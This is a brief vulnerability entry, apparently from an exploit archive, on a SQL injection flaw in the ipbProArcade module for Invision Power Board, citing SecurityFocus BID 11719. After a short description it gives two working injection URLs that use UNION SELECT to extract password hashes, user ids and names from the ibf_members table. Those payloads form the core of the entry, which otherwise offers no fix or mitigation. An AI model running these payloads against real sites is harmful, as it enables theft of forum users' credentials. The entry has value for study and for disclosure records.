10 lines
No EOL
787 B
Text
Executable file
10 lines
No EOL
787 B
Text
Executable file
source: http://www.securityfocus.com/bid/11719/info
|
|
|
|
A remote SQL injection vulnerability reportedly affects ipbProArcade. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query.
|
|
|
|
An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information.
|
|
|
|
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
|
|
|
|
For modules installed on Invision Power Board versions 2.X:
|
|
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* |